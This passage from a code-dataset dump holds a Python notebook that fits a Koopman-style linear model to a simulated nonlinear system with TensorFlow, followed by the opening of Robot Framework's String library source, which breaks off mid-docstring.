scipy.signal import savgol_filter\nimport scipy\nimport joblib\n\n\n# In[2]:\n\n\ndef model(x):\n    a11, a12, a21, a22, gamma = np.array([0.7, 0, 0.8, 0.9, 0.6])\n    x_f1 = a11*x[0] + a12*x[1]\n    x_f2 = a21*x[0] + a22*x[1] + gamma*x[0]**2\n    return [x_f1, x_f2]\n\n\n# In[3]:\n\n\nICs = []\nnum_ics = 50\nfor i in range(0, num_ics):\n    r = rd.uniform(30, 40)\n    theta = rd.uniform(0, 0.5*3.14)\n    ICs.append([r*np.cos(theta), r*np.sin(theta)])\n    \nfor i in range(0, num_ics):\n    plt.scatter(ICs[i][0],ICs[i][1])\n\n\n# In[4]:\n\n\nT = 100\nt = np.linspace(0, T, T+1)\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15,10))\nfig.suptitle('Horizontally stacked subplots')\nfor ic in ICs:\n    x = 
np.array([ic[0], ic[1]])\n sol = []\n for i in range(0, T+1):\n y = model(x)\n x = y\n sol.append(x)\n Xp_data = sol[0:-1]\n Xf_data = sol[1:]\n ax1.plot(t, np.array(sol).T[0])\n ax2.plot(t, np.array(sol).T[1])\n\n\n# In[5]:\n\n\nXp=tf.compat.v1.placeholder(tf.compat.v1.double, shape = (2, len(Xp_data)))\n\nXf=tf.compat.v1.placeholder(tf.compat.v1.double, shape = (2, len(Xp_data)))\n\n#n = tf.compat.v1.Variable(np.random.randn(), name = 'n', dtype = tf.double)\n#n1 = tf.compat.v1.get_variable('n1',\n# dtype=tf.double,\n# shape=(),\n# initializer=tf.random_uniform_initializer(minval=1., maxval=10.),\n# constraint=lambda z: tf.clip_by_value(z, 1, 10))\n\nn1 = tf.Variable(tf.compat.v1.truncated_normal((1, ), mean=1.5,stddev=0.3,dtype=tf.double))\n\n#n1 = tf.Variable(1.0, dtype = tf.double)\n\nKx = tf.Variable(tf.compat.v1.truncated_normal((3, 3), mean=0.0,stddev=0.1,dtype=tf.double));\n#np.abs(Y - W*b)\n\n\n#last_col = tf.constant(np.zeros(shape=(3, 1)), dtype=tf.dtypes.double)\n\n#last_col = tf.concat([last_col, [[1.]]], axis=0)\n\n#Kx = tf.concat([Kx, last_col], axis=1) \n#print(Kx)\n\n\n\n# In[6]:\n\n\nR2 = (1 - tf.divide(tf.math.reduce_sum(tf.math.square(tf.concat([Xf, [Xf[0]**n1]], axis = 0) - tf.math.reduce_mean(tf.concat([Xf, [Xf[0]**n1]], axis = 0), axis=0))), tf.math.reduce_sum(tf.math.square(tf.concat([Xf, [Xf[0]**n1]], axis = 0) - tf.matmul(Kx, tf.concat([Xf, [Xf[0]**n1]], axis = 0)))))) * 100\n\n\n# In[7]:\n\n\nsess = tf.compat.v1.InteractiveSession();\nsess.run(tf.compat.v1.global_variables_initializer());\n\n\n# In[8]:\n\n\ncost = tf.reduce_sum(tf.pow(tf.concat([Xf, [Xf[0]**n1]], axis = 0) - tf.matmul(Kx, tf.concat([Xp, [Xp[0]**n1]], axis = 0)), 2))/len(Xp_data)\n\nfwd_pred = tf.concat([Xp, [Xp[0]**tf.math.ceil(n1)]], axis = 0)\nfwd_pred_first = Xp[0][0]**tf.math.ceil(n1)\n\n\n# In[9]:\n\n\ninit = tf.compat.v1.global_variables_initializer()\nwith tf.compat.v1.Session() as sesh: \n # Initializing the Variables\n sesh.run(init) \n print(\"Initial n1\", sesh.run(R2, feed_dict = {Xp: np.array(Xp_data).T, Xf: np.array(Xf_data).T}))\n # Iterating through all the epochs\n\n\n# In[11]:\n\n\ntraining_epochs = 85000\nlearning_rate = 0.00005\nerror_threshold = 0.000000001\noptimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate, beta1=0.9, beta2=0.99, epsilon=1e-08, use_locking=False, name='Adam').minimize(cost)\ninit = tf.compat.v1.global_variables_initializer()\nc = 100\nepoch = 0\nwith tf.compat.v1.Session() as sesh: \n sesh.run(init) \n print(\"Initial n1\", sesh.run(n1))\n while epoch < training_epochs and c > error_threshold:\n c = sesh.run(cost, feed_dict = {Xp: np.array(Xp_data).T, Xf: np.array(Xf_data).T})\n if epoch % 5000 == 0:\n print(\"Epoch:\", epoch, \"{:.5f}\".format(c))\n print(\"Exponent\", sesh.run(n1))\n print(\"R2\", sesh.run(R2, feed_dict = {Xp: np.array(Xp_data).T, Xf: np.array(Xf_data).T}))\n sesh.run(optimizer, feed_dict = {Xp: np.array(Xp_data).T, Xf: np.array(Xf_data).T})\n epoch+=1\n KxT_num = sesh.run(Kx)\n #sesh.close()\n print(sesh.run(n1))\n print(sesh.run(cost, feed_dict = {Xp: np.array(Xp_data).T, Xf: np.array(Xf_data).T}))\n\n\n# ## Discrete model\n\n# In[ ]:\n\n\nmodel_name = 'CFS_data'\n\n\n# In[ ]:\n\n\nscaler = StandardScaler().fit(Xp)\nXp_ref_scaled = np.array(Xp)#scaler.transform(Xp)\nXf_ref_scaled = np.array(Xf)#scaler.transform(Xf)\n\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15,10))\n\nax1.scatter(np.linspace(0, len(Xp_ref_scaled[:, 0]), len(Xp_ref_scaled[:, 0])), Xp_ref_scaled[:, 0], color = 'r')\nax1.scatter(np.linspace(1, 
len(Xf_ref_scaled[:, 0])+1, len(Xf_ref_scaled[:, 0])), Xf_ref_scaled[:, 0], color = 'b')\n\nax1.set_xlim([-2, 22])\nax1.set_ylim([-5, 5])\n\nax2.scatter(np.linspace(0, len(Xp_ref_scaled[:, 1]), len(Xp_ref_scaled[:, 1])), Xp_ref_scaled[:, 1], color = 'r')\nax2.scatter(np.linspace(1, len(Xf_ref_scaled[:, 1])+1, len(Xf_ref_scaled[:, 1])), Xf_ref_scaled[:, 1], color = 'b')\n\n#ax2.set_xlim([-2, 22])\n#ax2.set_ylim([-5, 5])\n\n\n# scaler_filename = \"CFS_scaler.save\"\n# joblib.dump(scaler, scaler_filename) \n\n# In[ ]:\n\n\nPsiXp = np.vstack([Xp_ref_scaled.T, Xp_ref_scaled.T[0]**2.0])\nPsiXf = np.vstack([Xf_ref_scaled.T, Xf_ref_scaled.T[0]**2.0])\n\n\n# In[ ]:\n\n\nKx = np.matmul(PsiXf, np.matmul(PsiXp.T, np.linalg.inv(np.matmul(PsiXp, PsiXp.T))))\n\n\n# In[ ]:\n\n\nKx\n\n\n# In[ ]:\n\n\nnp.sum((PsiXf - np.matmul(Kx, PsiXp))**2)\n\n\n# In[ ]:\n\n\nimport joblib\n\nscaler_filename = 'CFS_scaler.save'\nscaler = joblib.load(scaler_filename) \n\nP = np.diag(scaler.scale_)\nb = scaler.mean_\n\nK11 = np.array([[0.7, 0], [0.8, 0.9]])\nK12 = np.array([[0], [0.6]])\nK21 = np.array([[0, 0]])\nK22 = np.array([[0.49]])\n\nKs11 = np.matmul(np.matmul(P, K11), np.linalg.inv(P))\nKs12 = np.matmul(P, K12)\nKs13 = np.matmul(np.eye(2) - Ks11, b)\nKs21 = np.matmul(K21, np.linalg.inv(P))\nKs22 = K22\nKs23 = np.matmul(Ks21, b)\n\nKs1 = np.concatenate([Ks11, Ks12, Ks13.reshape(-1, 1)], axis = 1)\nKs2 = np.concatenate([Ks21, Ks22, Ks23.reshape(-1, 1)], axis = 1)\nKs = np.concatenate([Ks1, Ks2, np.array([[0, 0, 0, 1]])], axis = 0)\n\nKs\n\n\n# In[13]:\n\n\nXp_final_learned = []\nXf_final_learned = []\nXp_final_actual = []\nXf_final_actual = []\n#t = np.array([i for i in range(0, N+1)])\nx_learned = np.zeros(2)\nx_actual = np.zeros(2)\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15,10))\n#fig.suptitle('Horizontally stacked subplots')\nT = 100\nt = np.linspace(0, T, T+1)\n\nfor ic in ICs:\n #ic_s = scaler.transform(np.array([ic]))\n x_learned = np.array(ic)\n x_actual[0] = ic[0]\n x_actual[1] = ic[1]\n X_learned = []\n #print(\"x_actual\", x_actual)\n #print(\"x_learned\", x_learned)\n X_actual = []\n X_learned.append([x_learned[0], x_learned[1]]) ## ICs\n X_actual.append(np.array([x_actual[0], x_actual[1]])) \n for k in range(0, T):\n y_learned = np.matmul(KxT_num, np.vstack([x_learned[0], x_learned[1], x_learned[0]**2]))[0:2].T[0]\n x_learned = y_learned#np.array([[y_learned[0], y_learned[1]]])\n X_learned.append([x_learned[0], x_learned[1]]) \n y_actual = model(x_actual)\n x_actual = y_actual\n X_actual.append(x_actual)\n ax1.scatter(t, np.array(X_actual).T[0])\n ax1.plot(t, np.array(X_learned).T[0])\n ax2.scatter(t, np.array(X_actual).T[1])\n ax2.plot(t, np.array(X_learned).T[1])\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"dmj6288/TunnelDMD","sub_path":"Data_Generation_CFS_control.py","file_name":"Data_Generation_CFS_control.py","file_ext":"py","file_size_in_byte":7404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13515055352","text":"import os\nimport re\nfrom fnmatch import fnmatchcase\nfrom random import randint\nfrom string import ascii_lowercase, ascii_uppercase, digits\n\nfrom robot.api import logger\nfrom robot.api.deco import keyword\nfrom robot.utils import (FileReader, is_bytes, is_string, is_truthy,\n parse_re_flags, safe_str, type_name)\nfrom robot.version import get_version\n\n\nclass String:\n \"\"\"A library for string manipulation and verification.\n\n ``String`` is Robot Framework's standard library for manipulating\n strings (e.g. 
`Replace String Using Regexp`, `Split To Lines`) and\n verifying their contents (e.g. `Should Be String`).\n\n Following keywords from ``BuiltIn`` library can also be used with strings:\n\n - `Catenate`\n - `Get Length`\n - `Length Should Be`\n - `Should (Not) Be Empty`\n - `Should (Not) Be Equal (As Strings/Integers/Numbers)`\n - `Should (Not) Match (Regexp)`\n - `Should (Not) Contain`\n - `Should (Not) Start With`\n - `Should (Not) End With`\n - `Convert To String`\n - `Convert To Bytes`\n \"\"\"\n ROBOT_LIBRARY_SCOPE = 'GLOBAL'\n ROBOT_LIBRARY_VERSION = get_version()\n\n def convert_to_lower_case(self, string):\n \"\"\"Converts string to lower case.\n\n Uses Python's standard\n [https://docs.python.org/library/stdtypes.html#str.lower|lower()]\n method.\n\n Examples:\n | ${str1} = | Convert To Lower Case | ABC |\n | ${str2} = | Convert To Lower Case | 1A2c3D |\n | Should Be Equal | ${str1} | abc |\n | Should Be Equal | ${str2} | 1a2c3d |\n \"\"\"\n return string.lower()\n\n def convert_to_upper_case(self, string):\n \"\"\"Converts string to upper case.\n\n Uses Python's standard\n [https://docs.python.org/library/stdtypes.html#str.upper|upper()]\n method.\n\n Examples:\n | ${str1} = | Convert To Upper Case | abc |\n | ${str2} = | Convert To Upper Case | 1a2C3d |\n | Should Be Equal | ${str1} | ABC |\n | Should Be Equal | ${str2} | 1A2C3D |\n \"\"\"\n return string.upper()\n\n @keyword(types=None)\n def convert_to_title_case(self, string, exclude=None):\n \"\"\"Converts string to title case.\n\n Uses the following algorithm:\n\n - Split the string to words from whitespace characters (spaces,\n newlines, etc.).\n - Exclude words that are not all lower case. This preserves,\n for example, \"OK\" and \"iPhone\".\n - Exclude also words listed in the optional ``exclude`` argument.\n - Title case the first alphabetical character of each word that has\n not been excluded.\n - Join all words together so that original whitespace is preserved.\n\n Explicitly excluded words can be given as a list or as a string with\n words separated by a comma and an optional space. Excluded words are\n actually considered to be regular expression patterns, so it is\n possible to use something like \"example[.!?]?\" to match the word\n \"example\" on it own and also if followed by \".\", \"!\" or \"?\".\n See `BuiltIn.Should Match Regexp` for more information about Python\n regular expression syntax in general and how to use it in Robot\n Framework data in particular.\n\n Examples:\n | ${str1} = | Convert To Title Case | hello, world! |\n | ${str2} = | Convert To Title Case | it's an OK iPhone | exclude=a, an, the |\n | ${str3} = | Convert To Title Case | distance is 1 km. | exclude=is, km.? |\n | Should Be Equal | ${str1} | Hello, World! |\n | Should Be Equal | ${str2} | It's an OK iPhone |\n | Should Be Equal | ${str3} | Distance is 1 km. |\n\n The reason this keyword does not use Python's standard\n [https://docs.python.org/library/stdtypes.html#str.title|title()]\n method is that it can yield undesired results, for example, if\n strings contain upper case letters or special characters like\n apostrophes. 
It would, for example, convert \"it's an OK iPhone\"\n to \"It'S An Ok Iphone\".\n\n New in Robot Framework 3.2.\n \"\"\"\n if not is_string(string):\n raise TypeError('This keyword works only with Unicode strings.')\n if is_string(exclude):\n exclude = [e.strip() for e in exclude.split(',')]\n elif not exclude:\n exclude = []\n exclude = [re.compile('^%s$' % e) for e in exclude]\n\n def title(word):\n if any(e.match(word) for e in exclude) or not word.islower():\n return word\n for index, char in enumerate(word):\n if char.isalpha():\n return word[:index] + word[index].title() + word[index+1:]\n return word\n\n tokens = re.split(r'(\\s+)', string, flags=re.UNICODE)\n return ''.join(title(token) for token in tokens)\n\n def encode_string_to_bytes(self, string, encoding, errors='strict'):\n \"\"\"Encodes the given Unicode ``string`` to bytes using the given ``encoding``.\n\n ``errors`` argument controls what to do if encoding some characters fails.\n All values accepted by ``encode`` method in Python are valid, but in\n practice the following values are most useful:\n\n - ``strict``: fail if characters cannot be encoded (default)\n - ``ignore``: ignore characters that cannot be encoded\n - ``replace``: replace characters that cannot be encoded with\n a replacement character\n\n Examples:\n | ${bytes} = | Encode String To Bytes | ${string} | UTF-8 |\n | ${bytes} = | Encode String To Bytes | ${string} | ASCII | errors=ignore |\n\n Use `Convert To Bytes` in ``BuiltIn`` if you want to create bytes based\n on character or integer sequences. Use `Decode Bytes To String` if you\n need to convert byte strings to Unicode strings and `Convert To String`\n in ``BuiltIn`` if you need to convert arbitrary objects to Unicode.\n \"\"\"\n return bytes(string.encode(encoding, errors))\n\n def decode_bytes_to_string(self, bytes, encoding, errors='strict'):\n \"\"\"Decodes the given ``bytes`` to a Unicode string using the given ``encoding``.\n\n ``errors`` argument controls what to do if decoding some bytes fails.\n All values accepted by ``decode`` method in Python are valid, but in\n practice the following values are most useful:\n\n - ``strict``: fail if characters cannot be decoded (default)\n - ``ignore``: ignore characters that cannot be decoded\n - ``replace``: replace characters that cannot be decoded with\n a replacement character\n\n Examples:\n | ${string} = | Decode Bytes To String | ${bytes} | UTF-8 |\n | ${string} = | Decode Bytes To String | ${bytes} | ASCII | errors=ignore |\n\n Use `Encode String To Bytes` if you need to convert Unicode strings to\n byte strings, and `Convert To String` in ``BuiltIn`` if you need to\n convert arbitrary objects to Unicode strings.\n \"\"\"\n if is_string(bytes):\n raise TypeError('Cannot decode strings.')\n return bytes.decode(encoding, errors)\n\n def format_string(self, template, *positional, **named):\n \"\"\"Formats a ``template`` using the given ``positional`` and ``named`` arguments.\n\n The template can be either be a string or an absolute path to\n an existing file. In the latter case the file is read and its contents\n are used as the template. If the template file contains non-ASCII\n characters, it must be encoded using UTF-8.\n\n The template is formatted using Python's\n [https://docs.python.org/library/string.html#format-string-syntax|format\n string syntax]. Placeholders are marked using ``{}`` with possible\n field name and format specification inside. 
Literal curly braces\n        can be inserted by doubling them like ``{{`` and ``}}``.\n\n        Examples:\n        | ${to} = | Format String | To: {} <{}> | ${user} | ${email} |\n        | ${to} = | Format String | To: {name} <{email}> | name=${name} | email=${email} |\n        | ${to} = | Format String | To: {user.name} <{user.email}> | user=${user} |\n        | ${xx} = | Format String | {:*^30} | centered |\n        | ${yy} = | Format String | {0:{width}{base}} | ${42} | base=X | width=10 |\n        | ${zz} = | Format String | ${CURDIR}/template.txt | positional | named=value |\n\n        New in Robot Framework 3.1.\n        \"\"\"\n        if os.path.isabs(template) and os.path.isfile(template):\n            template = template.replace('/', os.sep)\n            logger.info('Reading template from file <a href=\"%s\">%s</a>.'\n                        % (template, template), html=True)\n            with FileReader(template) as reader:\n                template = reader.read()\n        return template.format(*positional, **named)\n\n    def get_line_count(self, string):\n        \"\"\"Returns and logs the number of lines in the given string.\"\"\"\n        count = len(string.splitlines())\n        logger.info('%d lines' % count)\n        return count\n\n    def split_to_lines(self, string, start=0, end=None):\n        \"\"\"Splits the given string to lines.\n\n        It is possible to get only a selection of lines from ``start``\n        to ``end`` so that ``start`` index is inclusive and ``end`` is\n        exclusive. Line numbering starts from 0, and it is possible to\n        use negative indices to refer to lines from the end.\n\n        Lines are returned without the newlines. The number of\n        returned lines is automatically logged.\n\n        Examples:\n        | @{lines} = | Split To Lines | ${manylines} | | |\n        | @{ignore first} = | Split To Lines | ${manylines} | 1 | |\n        | @{ignore last} = | Split To Lines | ${manylines} | | -1 |\n        | @{5th to 10th} = | Split To Lines | ${manylines} | 4 | 10 |\n        | @{first two} = | Split To Lines | ${manylines} | | 1 |\n        | @{last two} = | Split To Lines | ${manylines} | -2 | |\n\n        Use `Get Line` if you only need to get a single line.\n        \"\"\"\n        start = self._convert_to_index(start, 'start')\n        end = self._convert_to_index(end, 'end')\n        lines = string.splitlines()[start:end]\n        logger.info('%d lines returned' % len(lines))\n        return lines\n\n    def get_line(self, string, line_number):\n        \"\"\"Returns the specified line from the given ``string``.\n\n        Line numbering starts from 0 and it is possible to use\n        negative indices to refer to lines from the end. The line is\n        returned without the newline character.\n\n        Examples:\n        | ${first} = | Get Line | ${string} | 0 |\n        | ${2nd last} = | Get Line | ${string} | -2 |\n\n        Use `Split To Lines` if all lines are needed.\n        \"\"\"\n        line_number = self._convert_to_integer(line_number, 'line_number')\n        return string.splitlines()[line_number]\n\n    def get_lines_containing_string(self, string, pattern, case_insensitive=False):\n        \"\"\"Returns lines of the given ``string`` that contain the ``pattern``.\n\n        The ``pattern`` is always considered to be a normal string, not a glob\n        or regexp pattern. A line matches if the ``pattern`` is found anywhere\n        on it.\n\n        The match is case-sensitive by default, but giving ``case_insensitive``\n        a true value makes it case-insensitive. The value is considered true\n        if it is a non-empty string that is not equal to ``false``, ``none`` or\n        ``no``. If the value is not a string, its truth value is got directly\n        in Python.\n\n        Lines are returned as one string catenated back together with\n        newlines. Possible trailing newline is never returned. 
The\n number of matching lines is automatically logged.\n\n Examples:\n | ${lines} = | Get Lines Containing String | ${result} | An example |\n | ${ret} = | Get Lines Containing String | ${ret} | FAIL | case-insensitive |\n\n See `Get Lines Matching Pattern` and `Get Lines Matching Regexp`\n if you need more complex pattern matching.\n \"\"\"\n if is_truthy(case_insensitive):\n pattern = pattern.lower()\n contains = lambda line: pattern in line.lower()\n else:\n contains = lambda line: pattern in line\n return self._get_matching_lines(string, contains)\n\n def get_lines_matching_pattern(self, string, pattern, case_insensitive=False):\n \"\"\"Returns lines of the given ``string`` that match the ``pattern``.\n\n The ``pattern`` is a _glob pattern_ where:\n | ``*`` | matches everything |\n | ``?`` | matches any single character |\n | ``[chars]`` | matches any character inside square brackets (e.g. ``[abc]`` matches either ``a``, ``b`` or ``c``) |\n | ``[!chars]`` | matches any character not inside square brackets |\n\n A line matches only if it matches the ``pattern`` fully.\n\n The match is case-sensitive by default, but giving ``case_insensitive``\n a true value makes it case-insensitive. The value is considered true\n if it is a non-empty string that is not equal to ``false``, ``none`` or\n ``no``. If the value is not a string, its truth value is got directly\n in Python.\n\n Lines are returned as one string catenated back together with\n newlines. Possible trailing newline is never returned. The\n number of matching lines is automatically logged.\n\n Examples:\n | ${lines} = | Get Lines Matching Pattern | ${result} | Wild???? example |\n | ${ret} = | Get Lines Matching Pattern | ${ret} | FAIL: * | case_insensitive=true |\n\n See `Get Lines Matching Regexp` if you need more complex\n patterns and `Get Lines Containing String` if searching\n literal strings is enough.\n \"\"\"\n if is_truthy(case_insensitive):\n pattern = pattern.lower()\n matches = lambda line: fnmatchcase(line.lower(), pattern)\n else:\n matches = lambda line: fnmatchcase(line, pattern)\n return self._get_matching_lines(string, matches)\n\n def get_lines_matching_regexp(self, string, pattern, partial_match=False, flags=None):\n \"\"\"Returns lines of the given ``string`` that match the regexp ``pattern``.\n\n See `BuiltIn.Should Match Regexp` for more information about\n Python regular expression syntax in general and how to use it\n in Robot Framework data in particular.\n\n Lines match only if they match the pattern fully by default, but\n partial matching can be enabled by giving the ``partial_match``\n argument a true value. The value is considered true\n if it is a non-empty string that is not equal to ``false``, ``none`` or\n ``no``. If the value is not a string, its truth value is got directly\n in Python.\n\n If the pattern is empty, it matches only empty lines by default.\n When partial matching is enabled, empty pattern matches all lines.\n\n Possible flags altering how the expression is parsed (e.g. ``re.IGNORECASE``,\n ``re.VERBOSE``) can be given using the ``flags`` argument (e.g.\n ``flags=IGNORECASE | VERBOSE``) or embedded to the pattern (e.g.\n ``(?ix)pattern``).\n\n Lines are returned as one string concatenated back together with\n newlines. Possible trailing newline is never returned. 
The\n        number of matching lines is automatically logged.\n\n        Examples:\n        | ${lines} = | Get Lines Matching Regexp | ${result} | Reg\\\\w{3} example |\n        | ${lines} = | Get Lines Matching Regexp | ${result} | Reg\\\\w{3} example | partial_match=true |\n        | ${ret} = | Get Lines Matching Regexp | ${ret} | (?i)FAIL: .* |\n        | ${ret} = | Get Lines Matching Regexp | ${ret} | FAIL: .* | flags=IGNORECASE |\n\n        See `Get Lines Matching Pattern` and `Get Lines Containing String` if you\n        do not need the full regular expression powers (and complexity).\n\n        The ``flags`` argument is new in Robot Framework 6.0.\n        \"\"\"\n        if is_truthy(partial_match):\n            match = re.compile(pattern, flags=parse_re_flags(flags)).search\n        else:\n            match = re.compile(pattern + '$', flags=parse_re_flags(flags)).match\n        return self._get_matching_lines(string, match)\n\n    def _get_matching_lines(self, string, matches):\n        lines = string.splitlines()\n        matching = [line for line in lines if matches(line)]\n        logger.info('%d out of %d lines matched' % (len(matching), len(lines)))\n        return '\\n'.join(matching)\n\n    def get_regexp_matches(self, string, pattern, *groups, flags=None):\n        \"\"\"Returns a list of all non-overlapping matches in the given string.\n\n        ``string`` is the string to find matches from and ``pattern`` is the\n        regular expression. See `BuiltIn.Should Match Regexp` for more\n        information about Python regular expression syntax in general and how\n        to use it in Robot Framework data in particular.\n\n        If no groups are used, the returned list contains full matches. If one\n        group is used, the list contains only contents of that group. If\n        multiple groups are used, the list contains tuples that contain\n        individual group contents. All groups can be given as indexes (starting\n        from 1) and named groups also as names.\n\n        Possible flags altering how the expression is parsed (e.g. ``re.IGNORECASE``,\n        ``re.MULTILINE``) can be given using the ``flags`` argument (e.g.\n        ``flags=IGNORECASE | MULTILINE``) or embedded to the pattern (e.g.\n        ``(?im)pattern``).\n\n        Examples:\n        | ${no match} = | Get Regexp Matches | the string | xxx |\n        | ${matches} = | Get Regexp Matches | the string | t.. |\n        | ${matches} = | Get Regexp Matches | the string | T.. | flags=IGNORECASE |\n        | ${one group} = | Get Regexp Matches | the string | t(..) | 1 |\n        | ${named group} = | Get Regexp Matches | the string | t(?P<name>..) | name |\n        | ${two groups} = | Get Regexp Matches | the string | t(.)(.) | 1 | 2 |\n        =>\n        | ${no match} = []\n        | ${matches} = ['the', 'tri']\n        | ${one group} = ['he', 'ri']\n        | ${named group} = ['he', 'ri']\n        | ${two groups} = [('h', 'e'), ('r', 'i')]\n\n        The ``flags`` argument is new in Robot Framework 6.0.\n        \"\"\"\n        regexp = re.compile(pattern, flags=parse_re_flags(flags))\n        groups = [self._parse_group(g) for g in groups]\n        return [m.group(*groups) for m in regexp.finditer(string)]\n\n    def _parse_group(self, group):\n        try:\n            return int(group)\n        except ValueError:\n            return group\n\n    def replace_string(self, string, search_for, replace_with, count=-1):\n        \"\"\"Replaces ``search_for`` in the given ``string`` with ``replace_with``.\n\n        ``search_for`` is used as a literal string. See `Replace String\n        Using Regexp` if more powerful pattern matching is needed.\n        If you need to just remove a string see `Remove String`.\n\n        If the optional argument ``count`` is given, only that many\n        occurrences from left are replaced. 
Negative ``count`` means\n that all occurrences are replaced (default behaviour) and zero\n means that nothing is done.\n\n A modified version of the string is returned and the original\n string is not altered.\n\n Examples:\n | ${str} = | Replace String | Hello, world! | world | tellus |\n | Should Be Equal | ${str} | Hello, tellus! | | |\n | ${str} = | Replace String | Hello, world! | l | ${EMPTY} | count=1 |\n | Should Be Equal | ${str} | Helo, world! | | |\n \"\"\"\n count = self._convert_to_integer(count, 'count')\n return string.replace(search_for, replace_with, count)\n\n def replace_string_using_regexp(self, string, pattern, replace_with, count=-1, flags=None):\n \"\"\"Replaces ``pattern`` in the given ``string`` with ``replace_with``.\n\n This keyword is otherwise identical to `Replace String`, but\n the ``pattern`` to search for is considered to be a regular\n expression. See `BuiltIn.Should Match Regexp` for more\n information about Python regular expression syntax in general\n and how to use it in Robot Framework data in particular.\n\n Possible flags altering how the expression is parsed (e.g. ``re.IGNORECASE``,\n ``re.MULTILINE``) can be given using the ``flags`` argument (e.g.\n ``flags=IGNORECASE | MULTILINE``) or embedded to the pattern (e.g.\n ``(?im)pattern``).\n\n If you need to just remove a string see `Remove String Using Regexp`.\n\n Examples:\n | ${str} = | Replace String Using Regexp | ${str} | 20\\\\\\\\d\\\\\\\\d-\\\\\\\\d\\\\\\\\d-\\\\\\\\d\\\\\\\\d | |\n | ${str} = | Replace String Using Regexp | ${str} | (Hello|Hi) | ${EMPTY} | count=1 |\n\n The ``flags`` argument is new in Robot Framework 6.0.\n \"\"\"\n count = self._convert_to_integer(count, 'count')\n # re.sub handles 0 and negative counts differently than string.replace\n if count == 0:\n return string\n return re.sub(pattern, replace_with, string, max(count, 0), flags=parse_re_flags(flags))\n\n def remove_string(self, string, *removables):\n \"\"\"Removes all ``removables`` from the given ``string``.\n\n ``removables`` are used as literal strings. Each removable will be\n matched to a temporary string from which preceding removables have\n been already removed. See second example below.\n\n Use `Remove String Using Regexp` if more powerful pattern matching is\n needed. If only a certain number of matches should be removed,\n `Replace String` or `Replace String Using Regexp` can be used.\n\n A modified version of the string is returned and the original\n string is not altered.\n\n Examples:\n | ${str} = | Remove String | Robot Framework | work |\n | Should Be Equal | ${str} | Robot Frame |\n | ${str} = | Remove String | Robot Framework | o | bt |\n | Should Be Equal | ${str} | R Framewrk |\n \"\"\"\n for removable in removables:\n string = self.replace_string(string, removable, '')\n return string\n\n def remove_string_using_regexp(self, string, *patterns, flags=None):\n \"\"\"Removes ``patterns`` from the given ``string``.\n\n This keyword is otherwise identical to `Remove String`, but\n the ``patterns`` to search for are considered to be a regular\n expression. See `Replace String Using Regexp` for more information\n about the regular expression syntax. That keyword can also be\n used if there is a need to remove only a certain number of\n occurrences.\n\n Possible flags altering how the expression is parsed (e.g. 
``re.IGNORECASE``,\n ``re.MULTILINE``) can be given using the ``flags`` argument (e.g.\n ``flags=IGNORECASE | MULTILINE``) or embedded to the pattern (e.g.\n ``(?im)pattern``).\n\n The ``flags`` argument is new in Robot Framework 6.0.\n \"\"\"\n for pattern in patterns:\n string = self.replace_string_using_regexp(string, pattern, '', flags=flags)\n return string\n\n @keyword(types=None)\n def split_string(self, string, separator=None, max_split=-1):\n \"\"\"Splits the ``string`` using ``separator`` as a delimiter string.\n\n If a ``separator`` is not given, any whitespace string is a\n separator. In that case also possible consecutive whitespace\n as well as leading and trailing whitespace is ignored.\n\n Split words are returned as a list. If the optional\n ``max_split`` is given, at most ``max_split`` splits are done, and\n the returned list will have maximum ``max_split + 1`` elements.\n\n Examples:\n | @{words} = | Split String | ${string} |\n | @{words} = | Split String | ${string} | ,${SPACE} |\n | ${pre} | ${post} = | Split String | ${string} | :: | 1 |\n\n See `Split String From Right` if you want to start splitting\n from right, and `Fetch From Left` and `Fetch From Right` if\n you only want to get first/last part of the string.\n \"\"\"\n if separator == '':\n separator = None\n max_split = self._convert_to_integer(max_split, 'max_split')\n return string.split(separator, max_split)\n\n @keyword(types=None)\n def split_string_from_right(self, string, separator=None, max_split=-1):\n \"\"\"Splits the ``string`` using ``separator`` starting from right.\n\n Same as `Split String`, but splitting is started from right. This has\n an effect only when ``max_split`` is given.\n\n Examples:\n | ${first} | ${rest} = | Split String | ${string} | - | 1 |\n | ${rest} | ${last} = | Split String From Right | ${string} | - | 1 |\n \"\"\"\n if separator == '':\n separator = None\n max_split = self._convert_to_integer(max_split, 'max_split')\n return string.rsplit(separator, max_split)\n\n def split_string_to_characters(self, string):\n \"\"\"Splits the given ``string`` to characters.\n\n Example:\n | @{characters} = | Split String To Characters | ${string} |\n \"\"\"\n return list(string)\n\n def fetch_from_left(self, string, marker):\n \"\"\"Returns contents of the ``string`` before the first occurrence of ``marker``.\n\n If the ``marker`` is not found, whole string is returned.\n\n See also `Fetch From Right`, `Split String` and `Split String\n From Right`.\n \"\"\"\n return string.split(marker)[0]\n\n def fetch_from_right(self, string, marker):\n \"\"\"Returns contents of the ``string`` after the last occurrence of ``marker``.\n\n If the ``marker`` is not found, whole string is returned.\n\n See also `Fetch From Left`, `Split String` and `Split String\n From Right`.\n \"\"\"\n return string.split(marker)[-1]\n\n def generate_random_string(self, length=8, chars='[LETTERS][NUMBERS]'):\n \"\"\"Generates a string with a desired ``length`` from the given ``chars``.\n\n ``length`` can be given as a number, a string representation of a number,\n or as a range of numbers, such as ``5-10``. When a range of values is given\n the range will be selected by random within the range.\n\n The population sequence ``chars`` contains the characters to use\n when generating the random string. It can contain any\n characters, and it is possible to use special markers\n explained in the table below:\n\n | = Marker = | = Explanation = |\n | ``[LOWER]`` | Lowercase ASCII characters from ``a`` to ``z``. 
